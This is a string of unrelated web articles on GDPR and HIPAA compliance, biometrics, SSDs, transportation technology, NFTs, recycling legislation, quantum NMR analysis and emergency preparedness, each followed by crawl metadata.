“It’s the centuries-old question — how to balance regulation and innovation. The OCC strikes the right tone by acknowledging this debate and recommending proceeding carefully,” Talbott said.
The document lacks specificity and mainly deals with high-level principles, Randy Benjenk and Michael Nonaka ofCovington & Burling said in an analysis of the OCC white paper. For example, the OCC did not address “the sometimes significant legal and supervisory barriers that banks face” regarding innovation.
Banking sector investments in fintech companies remain subject to the activity restrictions and additional requirements of the National Bank Act, the Home Owners’ Loan Act and other key statutes, they noted. Also, fintech companies that provide services to banking organizations potentially are subject to provisions of the Bank Service Company Act.
“The white paper also does not address the relevance of banks’ assessment areas for purposes of the Community Reinvestment Act performance evaluations as online and mobile banking use increases. In addition, the document does not discuss the chartering of fintech companies, although the comptroller’s remarks released in conjunction with the white paper touch on this subject,” Benjenk and Nonaka said.
The OCC also failed to address the larger question of whether new types of regulation should to apply to innovative methods for delivering financial services, whether or not delivered by banks, according to the analysis.
“Nevertheless, the white paper clearly represents a spark for further discussions on the issues surrounding bank innovation, and signals a new focus by the OCC on addressing the issues in a way that balances the industry’s commercial interests, consumer interests, and safety and soundness considerations,” Benjenk and Nonaka said.
The OCC on June 23 will host a forum on innovation in Washington, D.C. | <urn:uuid:07a1d11b-ab99-4e76-9fd6-9d62b001d772> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/treasury-department-examines-internets-impact-on-finance-system-83413.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00362.warc.gz | en | 0.949477 | 1,617 | 2.609375 | 3 |
GDPR Compliance Solutions
The General Data Protection Regulation (GDPR) is a European Union regulation that came into force on 25 May 2018 to ensure the protection and security of personal data.
The GDPR provides EU residents with control over their personal data and obliges any organizations that collect and process data related to EU citizens to comply with strict regulations, regardless of where those organizations are located. GDPR compliance is required whether data processing takes place within or outside the EU.
These regulations unify rules regarding the handling of personal data across all EU Member States, aiming to simplify compliance with data protection standards and all related legal procedures.
Key GDPR data protection measures
The GDPR protects the rights of data subjects (individuals) who provide their personal data to data controllers (persons or companies that determine the purposes and means of using personal data) and data processors (persons or companies that process personal data on behalf of data controllers) based within the EU as well as outside the EU if they offer goods and services to EU residents.
The GDPR obliges organizations to process users’ personal data lawfully, fairly, and transparently. To accomplish this aim, the GDPR implements the following measures:
The one-stop-shop principle. The GDPR unifies the handling of all matters regarding personal data across the EU. Thus, data subjects can file complaints in their country of residence even if their data was processed by a company based in another EU country or outside the EU.
Expanded rights of data subjects. Under the GDPR, data subjects have the following rights:
- be informed that their data is being collected
- access their personal data
- request rectification of incorrect data
- oblige a data controller to erase their personal data
- object to the processing of their data
- transfer their data to other services
High security standards. The GDPR obliges companies to implement all necessary security measures such as data encryption, access control, monitoring of processing activities, etc. to protect personal information.
Data protection officers. Organizations that process large quantities of personal data have to appoint a data protection officer who will monitor GDPR compliance and process requests from data subjects.
Penalties for non-compliance. With a tiered approach, the severity of a penalty depends on the severity of the violation. The maximum penalty for failure to comply with the GDPR is up to 4% of annual global turnover or up to €20 million, whichever is greater.
Using Ekran System to meet GDPR requirements
Deploying a specialized monitoring solution is an excellent way to ensure GDPR compliance. However, it’s essential to know which GDPR requirements a particular product covers.
Ekran System is a full-cycle insider threat management platform that effectively deters, detects, and disrupts insider threats. With its robust user activity and access management functionality, Ekran System can help you meet the requirements of GDPR Articles 5, 24, 32, 33, 35, and 39.
1. Demonstrate compliance
Demonstrate compliance with GDPR Articles 5 and 24 by proving that all data is processed legally and with all possible security measures applied.
Deploy Ekran System as a GDPR compliance solution to gather an audit trail and use it as clear evidence of compliance, as it demonstrates how and by whom data was processed.
- Record everything that happens within user sessions.
- Explore context-rich recordings of launched applications, visited URLs, typed keystrokes, executed commands, etc.
- Benefit with one-click search across suspicious activity to present a complete tamper-proof audit trail of user activity.
2. Maintain records of processing activities
Meet GDPR Articles 24 and 39 that require you to maintain records of all activities related to data processing and clearly know how and by whom sensitive data is processed.
Use Ekran System monitoring functionality to prove that your company processes all personal data in keeping with GDPR requirements and can quickly detect and mitigate any data security incidents:
- Record everything that happens within user sessions.
- Explore context-rich recordings of applications launched, URLs visited, keystrokes typed, commands executed, etc.
- Benefit from one-click search across suspicious activity to gather a complete tamper-proof audit trail of user activity.
3. Strengthen your data protection
Implement various technical and procedural measures to secure users’ personal data as per GDPR Articles 32 and 35.
- Secure your critical data by making sure it can only be accessed by authorized users.
- Customize real-time responses to protect sensitive data and educate users on prohibited actions.
- Detect anomalies in user behavior with an AI-powered user behavior analytics module.
- Ensure secure but convenient work for users with a lightweight PAM solution.
4. Detect and investigate security incidents
Comply with the requirements of GDPR Article 33, which obliges you to disclose any incidents that can pose a risk to data subjects within 72 hours of detecting them.
Leverage Ekran System’s robust security incident investigation functionality to detect incidents, investigate them quickly, and report all results before the 72-hour deadline imposed by the GDPR.
- Detect potential incidents with predefined and custom alerts.
- Get an immediate live session view of any user session to see a user’s actions before and during an incident.
- Respond instantly to an identified incident by sending a warning message or blocking the session.
- Gather all evidence in a tamper-proof format for further forensic investigation.
Ekran System – Your solution for GDPR compliance
Ekran System provides a complete tamper-proof audit trail of everything that happens during each user session, allowing you to instantly detect and mitigate insider threats.
With comprehensive insider threat protection functionality, reliable detection tools, and a high potential for incident investigation, Ekran System is the right solution for meeting GDPR requirements. | <urn:uuid:938423af-234b-4ff9-a423-49992c78fa84> | CC-MAIN-2022-40 | https://www.ekransystem.com/en/solutions/meeting-compliance-requirements/gdpr-compliance | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00362.warc.gz | en | 0.905271 | 1,209 | 2.5625 | 3 |
In the world of information technology, the term “biometrics” (also referred to as “biometric authentication”) is the automated method of recognizing a person based on their unique physiological or behavioral traits. Common examples of human biometric markers are fingerprints, finger and palm veins, iris and facial recognition, even one’s voice print.
According to Microsoft’s chairman and chief software architect, Bill Gates, “Biometrics is one of the keys to providing “a more transparent, secure and manageable security on a mass scale.”
Need for a stronger user authentication
In this computer-driven era, identity theft and the loss or disclosure of sensitive data and related intellectual property are growing rapidly. Currently, options available for user authentication fall within three categories – those that require what you know (e.g. passwords), those that require what you have (e.g. smart cards) and those that verify who you are (e.g. biometric characteristics).
Long, complex and unmemorable alphanumeric passwords are hard to remember but recommended by system administrators. Smart cards provide higher assurance levels for authentication over passwords but there’s the issue of lost or stolen cards. Since physically having a smart card is required for authentication, what does an employer do if an employee loses or leaves his or her card at a public location?
Among all three authentication techniques, biometrics are the most advanced form of identification and verification. The events of September 11, 2001, have spurred a great deal of interest in further enhancement or refinement of this technology.
Biometrics provide strong security
Passwords have been the standard means of user authentication for decades on our home and office computers. However, as users are required to remember more, longer, and constantly changing passwords, it is evident that a more convenient and secure solution to user authentication is necessary.
Biometric authentication techniques are exceptionally reliable for a positive identity match. A false acceptance or false rejection is rare, although possible, depending on the accuracy of the biometric systems and sensor characteristics. Incorporation of a liveness detection technique makes an attack against the biometric system more difficult. Our Enterprise Biometrics Suite™ , is an enterprise ready biometric-based Single Sign On (SSO) solution that provides an air-tight mechanism to authenticate users requesting access to network resources.
Different biometric systems provide different levels of security as measured by false acceptance rate (FAR) and false rejection rate (FRR) scores. For example, iris biometrics and vascular (finger vein and palm vein) biometrics usually offer lower FAR and FRR rates than non-contact technologies such as facial or voice recognition. However, before rejecting any biometric type on the grounds of its FAR and FRR scores, it is important to consider what level of security you need a biometric system to provide.
It’s also important to take into account the environment a biometric authentication system will be used in. For example, fingerprint readers do not work well in environments where users’ fingers are likely to be dirty. Similarly, voice recognition systems are not a good match for excessively noisy environments. Thus, the best biometrics is the combination of two or more biometric modalities.
M2SYS’ Hybrid Biometric Platform supports fingerprint, finger vein, palm vein, and iris recognition using a range of hardware such as the M2-EasyScan™ fingerprint reader, M2-PalmVein™ palm vein reader, M2-AutoTilt™ iris recognition camera and M2-FuseID™ SMART (fingerprint and finger vein) dual purpose reader. It also supplies biometric middleware to enable the integration of its biometric platform into Windows and web software, and a product called Bio-Plugin™ which allows its biometric authentication to be integrated to any Windows or web based application.
Biometric technology is a very promising way of authenticating users. Users may be authenticated by their personal computers or by workstations during login, by their finger vein patters to confirm a bank transaction, or by a palm access control system to open a door. All of these cases are typical and correct places to deploy a biometric identification management system. Biometrics provide secure protection from cryptographic functions as well as when biometric matching, feature extraction, and the biometric sensor are all integrated in one device. | <urn:uuid:d214055d-ab70-4e2c-b2c9-94ce37b19f20> | CC-MAIN-2022-40 | https://www.m2sys.com/blog/biometric-technology/biometrics-is-the-future-of-user-authentication/?utm_source=blog&utm_medium=blog%20post&utm_campaign=voice%20biometrics%20expands | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00362.warc.gz | en | 0.916899 | 918 | 2.78125 | 3 |
In all the hoopla about the price of solid-state drives compared with hard-disk drives, the reality of SSD benefits may have been missed. In a nutshell, if you replace those slow HDDs with some SSDs, server performance is substantially increased.
This means fewer servers to do the same job. We aren’t talking a percentage point or two here. Even without re-tuning the applications, performance can improve between 30% and 1,000%, according to various estimates. That’s because many of our applications are IO-starved -- a problem goes away completely even with low-end SSD.
Still, years of slow hard drives have brainwashed many into believing that improved server performance is achieved by moving to the next version of CPU. This really was the only good solution for the three decades when HDD performance hardly changed.
The first inkling of “SSDs as a server cost saver” dates back to 2007, when Intel found that using SSDs reduces the need for expensive registered DRAM. In fact, Intel saw that half the DRAM could be removed without losing performance. Current SSDs are much faster than those first drives, so the effect is probably understated today.
The next logical step was to figure how much faster applications ran using SSD. Intel's initial tests were a mixed bag, since some applications were so dated in their IO structure that they ran single- threaded disk operations and hibernated while waiting for the data. The overhead in the IO reduced performance enormously. Still, that is mostly behind us now.
So, how much faster are SSDs today? It depends on what you do. If your access is random IO, such as for a SQL database, a SSD can range upward from 80,000 IOPS compared with the best HDD at 300 IOPS. If, on the other hand, you are looking at a streaming scenario such as surveillance video, the gap isn’t quite as pronounced, with a SSD at 500 MBPS versus 120 MBPS for a typical bulk hard drive.
Even so, this is a substantial increase, which we can expect to leverage into the total application performance. Tests of databases find SSDs provide big plus in performance, giving the IT shop an option: They can deliver more with less, either repurposing some of the servers or avoiding an expensive server upgrade.
It doesn’t take an Excel whiz-kid to figure out that needing just 30% less servers to do the job is cheaper than the SSDs needed to make it happen. In fact, with typical savings better than 30%, anyone faced with a server upgrade need would do well to look at SSDs instead. With a 60% reduction, the savings on 100 typical servers at $6,000 each is around $250,000.
(Image: pefertig via Pixabay)
Of course, that’s a guesstimate. Fewer software licenses may increase the savings a lot. I also figured on being smart and only replacing four of the HDDs in a typical 12-drive server with SSDs. Those four SSDs should be plenty big enough to use for hot data, with the remaining HDDs used as bulk storage for older data. Caching or auto-tiering software can handle the process of delegating data to the slow bulk store.
SSDs bring cost benefits to a whole raft of environments. Web servers can deliver content much more quickly, giving a website that feeling of crispness that consumers notice. Again, there are server count savings. This class of application can even use cheaper SSDs, since the data is read-mostly and wear life is not an issue.
In the surveillance space, the relative price of SSDs to HDDs still prevents any move to replace the HDD. That will change over the next couple of years, as SSD prices drop to HDD levels. At that point, the extra performance of SSDs in streaming mode will make them the preferred solution. It may be possible to use fewer drives to support the same number of cameras, allowing for a much more compact server solution.
The server count reduction isn’t limited to just changing some server drives. Anything connected to networked storage can benefit from a boost in storage performance. Virtual servers are notoriously IO-limited and making the filers, or block storage faster by a major factor really helps. Remember that there is no such thing as sequential IO in a virtual server farm; each IO is so fragmented to ensure fair shares to all the tenants that all IO is random.
In networked storage, only hot data needs to be on SSD. This limits the cost of adding the extra performance. There are many ways to get the benefit, including all-flash arrays that are plug-and-play, putting SSDs in existing arrays, and adding flash cards to the filer to allow cloning and buffering at high speed.
The bottom line is that if you look at your total data center costs, adding some SSDs will likely provide big savings by avoiding new server purchases, getting more from the installed base, and delivering much better response times to users. | <urn:uuid:b6b1261a-561e-4fee-b098-809e28b7a37b> | CC-MAIN-2022-40 | https://www.networkcomputing.com/data-centers/how-ssds-can-reduce-server-costs | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00362.warc.gz | en | 0.952759 | 1,057 | 2.59375 | 3 |
The future of the car is the future of transportation. What do we mean by that? It is not to say that the car is the future of transportation, rather the future of the car will depend on how the broader transportation system digitally evolves. The digital transformation of transportation infrastructure will have profound influence on how and how quickly the digitalization of the car will play out as will the stitching between the intelligent car and the intelligent infrastructure – connectivity.
This neXt Curve research brief explores the opportunities, benefits and challenges that face the automotive and transportation industries as they pursue a future of automation and autonomy. This brief covers the following subjects:
- The Autonomous Future of the Car – What is the state of the autonomous vehicle? Given all the hype and misconceptions that have shrouded the technology, what can we reasonably expect in terms of delivered promises for safety, traffic efficiency, and sustainability today and the future? Is the driverless utopia just around the corner or further out in the horizon?
- Intelligent Transportation Infrastructure – Transportation infrastructure is going through a digital transformation around the globe but how will it support and catalyze the digital evolution of the car? How will it develop intelligent capabilities that will foster new services that will provide critical support for autonomous vehicles while helping the transportation system deal with the universe of analog, unconnected, and offline things on the road?
- The Role of 5G in the Evolution of Transportation – 5G is finally here but is it having an impact on the digitization and digital transformation of transportation systems that are the vehicle and the infrastructure? What is the role of 5G and what makes mobile wireless communications an essential factor in the evolution of intelligent transportation systems?
- The Future of Transportation is Mobile Computing – The advent of the electric vehicle and significant progress made in autonomous vehicle technologies are leading the industry to reimagine the idea of the car. It is increasingly becoming a smartphone on wheels. What are the implications on the auto industry as intelligent transportation systems grapple with the challenges of mobile computing. | <urn:uuid:5412d632-0113-4afe-b852-ade8d51cc7cb> | CC-MAIN-2022-40 | https://next-curve.com/2021/09/08/the-future-of-transportation-a-system-of-systems-perspective-on-the-future-of-the-car/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00562.warc.gz | en | 0.929278 | 403 | 2.640625 | 3 |
HIPAA Security Rule
HIPAA, which is the Health Insurance Portability and Accountability Act of 1996, is United States legislation and makes security provisions for the safeguarding of medical records information. HIPAA was passed as a security cover for the PHI or Protected Health Information and was to put all the physical, administrative, and technical things in place with the provision for data privacy, information integrity, and accessibility. HIPAA is enforced by the ‘Health and Human Services Office of Civil Rights’ department. HIPAA security rule is of utmost importance for healthcare centers and its closed associates, who deal with sensitive patient healthcare records.
HIPAA Security and Privacy Rule
HIPAA provides for some security features to protect the medical records and the health information of patients that are as follows:
- Technical: This deals with the technologies involved in the policies and procedures and the ways to use them. It is mainly to protect the ePHI and the data access controls in the following areas:
- Data Access: This controls features like overwriting, reading, modifying, and information communicating in the form of application, system, or file. It helps in instantly taking decisions for emergencies and data encryption. The controls should have the automatic log out function and a unique identifier of a user.
- Audit Controls: This is to regulate the activities associated with ePHI like recording and examining the data.
- Data Integrity: When data is to be modified or destroyed in a secretive manner, then procedures and policies involving data integrity are involved.
- User Authentication: Through this, individual verification is included which ensures that data is accessed only by the authentic user, thereby, reducing data breach chances.
- Physical: The policies, procedures, and physical approaches needed to protect the electronic data machine and its associated components are included in the physical security rule. It involves the following:
- Workstation Security: The workstation where the ePHI is accessed needs physical security implementation. A blueprint is prepared to know how the workstation can be used and what all security standards need to be followed as per the workstation rule. By this, the physical unauthorized access of the data in the secured room can be restricted.
- Workstation Use:: This is concerned with the appropriate use of a business workstation. This includes the electronic media and the computing elements saved under an immediate environment like the access to billing information workstation that can be accessed with no other running mode apps in the background browser.
- Administrative: The development, maintenance, selection, and implementation of all the security features for ePHI protection by enforcing policies, actions, and activities are included in the administrative HIPAA security rule checklist. The HIPAA security rule mostly comprises of administrative safeguards like managing the employee’s conduct associated with ePHI protection. Some of its features are given below:
- Certain policies and procedures are defined in the HIPAA cyber security management process which aids in the detection, prevention, and correction of violations. A crucial risk analysis is first conducted and then the plan is implemented accordingly.
- Another important aspect is workforce security that includes all the policies and procedures governing the employee access of the ePHI data. The main features of this are user authorization, clearance, supervision, and termination.
- There are many features in the HIPAA security rule for dealing with security incidents. The incidents are identified and the reports are sent to the authentic person. Security incidents may mean the reporting of unauthorized access to the accounts, leakage of data, and destruction of information without prior knowledge of the administrator.
Data-Based Verdict for HIPAA
The average cost for HIPAA implementation in an enterprise is approximately $6 million if the fine applied by OCR is excluded. Non-compliance in itself causes huge losses to the enterprise in the form of finance, lawsuits from the affected parties, and breach notification costs. The other major challenges include the loss of reputation in the market with a gradual decrease in customer trust. If data is to be secured and HIPAA compliance is to be achieved, then it is better that enterprises go in for some good CASB solutions provided by some eminent Cloud Access Security Broker that is known for its quality and that provides an additional security layer, so that any unauthorized access is prevented; thus reducing the data breach risks. | <urn:uuid:9ca9e090-bf54-47da-90ea-2a7809c19578> | CC-MAIN-2022-40 | https://www.cloudcodes.com/blog/hipaa-security-privacy-rule.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00562.warc.gz | en | 0.942329 | 875 | 3.0625 | 3 |
And there are many more examples. The pushback against the virtual reality hype began in the early ’90s, and one wit noted there were more virtual reality conferences than customers.
Public key encryption was invented 30 years ago, but even now most email is not encrypted. The Josephson junction was an “inevitable” technology in the early 1980s. Is quantum computing inevitable in the same way?
This isn’t to say that none of these projects had an impact. However, what they delivered was far less than what was promised.
And there are more: Smart homes have not met expectations. Or biometrics, telecommuting, and smart cards. Or paperless offices, ebooks, micropayments, bubble memory, RISC logic, the network computer, and dozens more, both inside and outside the IT industry. None lived up to its hype.
It’s easy to get sidetracked to the reasons why these technologies failed—consumer resistance, the economics didn’t make sense, technical difficulties, and so on—but these reasons are beside the point.
These technologies were all big in their day. There was lots of buzz. The experts predicted great things for them. But history shows that most “inevitable” technologies aren’t. In fact, most new products fail.
The moral of the story? Be skeptical next time you hear about the “Next Big Thing.”
Bob Seidensticker is an engineer who writes and speaks on the topic of technology change. A graduate of MIT, Bob has more than 25 years of experience in the computer industry. He is author of Future Hype: The Myths of Technology Change and holds 13 software patents. | <urn:uuid:296bfbb5-66d7-42fe-82ff-21aff3da5a4c> | CC-MAIN-2022-40 | https://cioupdate.com/be-skeptical-about-the-147next-big-thing148/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00562.warc.gz | en | 0.966756 | 361 | 2.6875 | 3 |
August the Senate passed a $1 trillion infrastructure bill, the INVEST in America Act, focusing on construction improvements, communications systems, and environmentally sustainable energy. The bill was passed by the House on Nov. 5, and officially signed into law by the president. In a 228-206 vote, many are pleased that the importance of environmental sustainability has finally made progress.
In collaboration with ISRI, Sen. Rob Portman of Ohio first presented the bill in 2019 before it was introduced to the 117th congress on March 23. Included in the 2,700 page bill are several important components for the recycling industry such as, Recycling Enhancements to Collection and Yield through Consumer Learning and Education(RECYCLE) Act, critical mineral and battery recycling, and the Environmental Protection Agency’s pollution prevention program. The RECYCLE Act aims to improve contamination issues in residential recycling by educating the public and raising awareness for what and what not to put in recycling bins. The bill will also require the EPA to construct a model recycling program toolkit in order to improve recycling rates and decrease contamination in the recycling stream.
Following the rising concern of the dangers of lithium-ion batteries, the infrastructure package aims to reduce issues with the batteries and produce solutions for safe handling of LIBs. The bill includes provisions for battery research, and how to recycle lithium-ion batteries, as well as advisories for worker protections. In addition, the issue of pollution is being tackled as well. $100 million has been set aside for the EPA pollution-prevention program, with $3.5 billion available for five years for the remedial account within the Superfund for cleanups and remedial actions on Superfund sites.
Recycling may not seem like an issue worthy of legislative attention, however, when not addressed many types of waste can accumulate and create many issues within the community, and eventually affect our environment. IT asset disposition facilities like HOBI International Inc. collect electronic waste and ensure that it is disposed of properly. E-waste is possibly the most dangerous kind of waste due to the fact that when left in landfills, it can create water and air contamination, as well as fires.
For more information about our ITAD services call 977-814-2620, or contact HOBI at firstname.lastname@example.org. | <urn:uuid:9282cefc-cf72-4d3d-b787-004ad9587ebb> | CC-MAIN-2022-40 | https://hobi.com/house-passes-recycling-bill/house-passes-recycling-bill/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00562.warc.gz | en | 0.946722 | 475 | 2.546875 | 3 |
Did you hear about the JPG file that sold for $69 million?
I’ll give you some more detail, the JPG file is a piece of digital art made by Mike Winkelmann, the artist known as Beeple. The file was sold on Thursday by Christie’s in an online auction for $69.3 million. This set a record for artwork that exists only digitally. Which for many people raised the question: what’s to stop me from copying it and becoming an owner as well? After all, digital files can be copied ad infinitum, with no loss of quality.
Which is where non-fungible tokens (NFTs or “nifities”) come in. NFTs are the latest, most eyebrow-raising use of blockchain technology.
What are Non-Fungible Tokens (NFTs)?
Non-fungible means the token has unique properties so it cannot be interchanged with something else. Money, for example, is fungible. You can break down a dollar or a bitcoin into change and it will still have the same value. An artwork is more like a house, each one is unique and can't be broken into useful fractions. (Although for houses sometimes it is only the location that makes it different from its neighbors.)
But I made the analogy because for houses we have a ledger to keep track of who owns the house. If you want to know who owns a house, you look it up in the ledger. You can think of an NFT as a certificate of ownership for a unique object, virtual or tangible.
Art and technology
While the combination of art and technology may have sounded strange a century ago, nowadays they are no longer a rare combination. The first use of the term digital art was in the early 1980s when computer engineers devised a paint program which was used by the pioneering digital artist Harold Cohen. This became known as AARON, a robotic machine designed to make large drawings on sheets of paper placed on the floor.
Andy Warhol or David Hockney may be more familiar names, even for those that are not that into art. Andy Warhol created digital art using a Commodore Amiga where the computer was publicly introduced at the Lincoln Center, New York in July 1985. Hockney is huge fan of the iPad.
Art and NFTs
The maintenance of the digital ledger to keep track of who owns a digital work of art is done using blockchain technology. Blockchains make it almost impossible to forge records.
Copies of the blockchain are kept on thousands of computers and each item in the blockchain is cryptographically linked to every item that comes after it. Forging a record in a blockchain ledger means re-doing the transaction you want to forge, and every subsequent transaction, on a majority of all the copies in existence, at the same time.
Unlike bitcoins, each NFT is unique and can contain details like the identity of its owner or other metadata. NFTs also include smart contracts. Smart contracts store code instead of data in a blockchain, and execute when particular conditions are met. An example of an NFT smart contract might give an artist a percentage of future sales of their work.
But to answer the original question, this doesn’t stop anyone from copying a digital masterpiece and enjoying it at home. The NFT ledger only shows who the owner of the original is.
Even though the blockchain technology itself is secure, the applications that are built on or around it, such as websites or smart contracts, don't inherit that security, and that can cause problems.
Users of the digital art marketplace Nifty Gateway reported hackers had taken over their accounts and stolen artwork worth thousands of dollars over the weekend.
Someone stole my NFTSs today on @niftygateway and purchased $10K++ worth of today's drop without my knowledge. NFTs were then transferred to another account.
Some victims reported that the digital assets stolen from their accounts were then sold on the chat application Discord or on Twitter. The underlying problem, according to many claims, was that the thieves hacked the owner’s accounts. They then used the accounts to sell, buy, and re-sell NFTs.
This is possible because blockchain security is designed to prevent forgery, not theft. If somebody steals your NFT and sells it, the blockchain will faithfully record the sale, irreversibly.
Art turned into NFT without the artist’s knowledge
Some artists are reporting their work has been stolen and sold on NFT sites without their knowledge or permission. In some cases, the artist only learned about the theft weeks or even years later, having stumbled upon their work on an auction site. The people creating the NFT had no ownership and probably just copied the artwork from the artist’s website.
Identifying the original file
The way NFTs are set up now they depend too much on URLs that might end up broken at some point in time. Or get hijacked by some clever threat actor. Jonty Wareing did an analysis on how Nifty references the original and was not impressed. He expressed his concerns on Twitter. He found the fact that both the NFT token for the json metadata file as well as the IPFS gateway are defined by URLs set up by the seller. IPFS is a distributed system for storing and accessing files, websites, applications, and data.
The NFT token you bought either points to a URL on the internet, or an IPFS hash. In most circumstances it references an IPFS gateway on the internet run by the startup you bought the NFT from.
Which means when the startup who sold you the NFT goes bust, the files will probably vanish from IPFS too
Problems with art and NFTs
The reported crimes are made possible by three apparent flaws in the way the system was set up.
- It is possible to create more than one NFT for the same work of art. This creates separate chains of ownership for the same work of art.
- If no NFT exists for a certain work of art, creating one does not require you to be the owner. This creates false chains of ownership.
- The references defining the original depend too heavily on URLs that are vulnerable and could vanish at some point.
To circle back to our analogy with real estate, the only way a ledger can be expected to give an accurate account of ownership is by having one central ledger that checks whether the first owner did buy the object directly from the creator. The creation of such a new ledger should also include a check whether there is not an existing registration for the same object to avoid creating a duplicate. And for digital files we need a better way to define them. Storing URLs in the blockchain will protect the URL and not the underlying file. | <urn:uuid:d39cfe51-f342-4408-9431-c83bb0023929> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2021/03/nfts-explained-daylight-robbery-on-the-blockchain | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00562.warc.gz | en | 0.95885 | 1,412 | 2.71875 | 3 |
Usually, NMR spectroscopy is used to determine small molecules in biological samples such as blood and urine. It is a powerful diagnostic tool for medical professionals to help them identify biomarkers of specific diseases and disorders.
But, this technique has its limitations, especially when scientists need to distinguish particles that haven’t been cataloged already — that is, by far most of them.
To make this complicated and time-consuming process a lot simpler, a trio of doctors and scientists from Brigham and Women’s Hospital and Harvard Medical School created a new algorithm for decoding signals from NMR readings that draws from both quantum computing and classical machine learning.
Scientists figured that since the basics of NMR, short for Nuclear Magnetic Resonance , is grounded in quantum mechanics, then maybe a quantum computer could help push the technique beyond the current limits set by utilizing ordinary computer processors to decipher the data.
The algorithm reduces the process that takes several days by classical computers into several minutes. As it uses only 50 to 100 quantum bits or qubits, the algorithm works on both quantum computers that already exist and the so-called “near-term” quantum computers now being developed.
Eugene Demler, professor of physics and one of the paper’s co-authors, said, “We should not just think of applications for perfect quantum computers. We should think of applications of quantum computers for the near future. It’s important to realize that we can use these non-perfect computers — these noisy, intermediate-scale quantum computers — to study already what’s important for biomedical research.”
Currently, the algorithm is in the proof-of-concept stage, but it has paved the way towards possibilities in chemical, medical, and biological research using NMR.
Paper co-author Samia Mora, an associate professor of medicine at the Medical School and a cardiovascular medicine specialist at the Brigham, said, “Take blood, for example. We know there are thousands of molecules in the bloodstream, but right now, with NMR, we probably only measure about 200 [of them]. In the future, ideally, we would be able to expand this algorithm to be able to solve for this problem of what are these molecules in the bloodstream beyond the ones that we already know.”
“Having a better understanding of the molecular signatures of diseases or treatments is very impactful for many areas across many, many different disciplines.”
Scientists also wanted to crack at a problem that has real-world applications, is hard for classical computers yet could be solved using existing and near-term quantum computers. Quantum-assisted NMR spectroscopy checked all the boxes since the readings, called a spectrogram, are put together by measuring a complex set of quantum spins.
For example, to get a spectrogram, biological samples are placed inside a machine that has a magnetic field and is then bombarded with radio waves to excite the nuclear magnetic properties in the molecules. The NMR machine reads those spins as different signatures.[…] | <urn:uuid:3aa3a91a-7a11-4f79-9667-71ef66caaa02> | CC-MAIN-2022-40 | https://swisscognitive.ch/2020/07/26/harvard-scientists-created-a-hybrid-algorithm-for-nmr-readings/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00562.warc.gz | en | 0.94689 | 623 | 3.671875 | 4 |
We are all familiar with Mother Nature’s violent electrical storms and what happens when there’s a loss of power and everything goes dark. Everyone worries, and life and work as we know it becomes paralyzed. The August 2003 Toronto blackout, the biggest one in North American history, served as an important, although unplanned, test of emergency preparedness for many organizations. It also served as a call to action for organizations that realized they did not have proper emergency preparedness and business continuity plans in place that included addressing the long-term unavailability of utility power.
It’s not a matter of if, it’s a matter of when, and for the purpose of supporting critical operations, the public utility power grid is unreliable. It’s through this precautionary principle frame of mind that effective emergency preparedness plans begin. The 2003 blackout, that affected 55 million people, was an event that Q9’s Toronto-One Data Centre was uniquely equipped to handle.
Data centres should always assume inherent unreliability of public utility power sources, and be able to maintain continuous operations throughout emergencies. Their capabilities should include on-site power generation and refueling. Just as important, minimum N+1 redundant design of internal power delivery systems and qualified in-house technicians are responsible for regular inspection, testing, and maintenance. Data centres should have 100 per cent uptime, and should be designed for full end-to-end control of their power systems. They should not rely on the availability of external resources to ensure successful implementation and operation.
How cloud can help
In an emergency, rapid communications and continued operations are critical to minimizing the impact of the incident. One of the advantages of cloud infrastructure is that it can be engineered for diversity of hardware, hosts, and even geographies. When combined with the elastic nature of cloud, a system like this inherently provides the ability to protect both data and applications by applying redundancy as desired across the cloud.
While the underlying ability to implement redundancy, backup, High Availability (HA), and Disaster Recovery (DR) exists in most well-engineered cloud platforms, the actual design, customization, implementation, and execution of such strategies can still be tricky or cumbersome for the average business to actually engineer and realize.
It’s important to really understand what your cloud provider – or if you’re building a private cloud, your cloud technology vendors – can provide you, both in terms of technological capability as well as management and support.
Preparing for an emergency
In addition to understanding how to enable the redundancy of your data and applications, it’s critical to understand the network connectivity to your cloud and how it’s protected. Make sure you’ve worked with your network teams to provide the required redundancy needed both at the network, and if required, at the load-balancing level to make sure your cloud remains resilient and available.
One of the biggest things to note here is telemetry. Understanding the underlying status of your cloud and the components and technologies that drive it means you can pull the telemetry and reporting you need not only to diagnose and recover from an event when it happens, but to potentially even prevent the incident in the first place. Of course, this means choosing a technology stack that can provide the required level of detail and intelligence when it comes to this kind of telemetry data. | <urn:uuid:97f97c40-d6ed-4aef-a5e6-3f580754ffcb> | CC-MAIN-2022-40 | https://channeldailynews.com/blog/how-to-keep-your-company-running-during-an-emergency/50758 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00562.warc.gz | en | 0.94534 | 686 | 2.6875 | 3 |
It may seem obvious who HIPAA applies to – anyone with access to health information – but it is not as simple as one might think. The application of HIPAA is not discussed extensively in the act itself, so there can often be confusion as to who exactly must be HIPAA compliant.
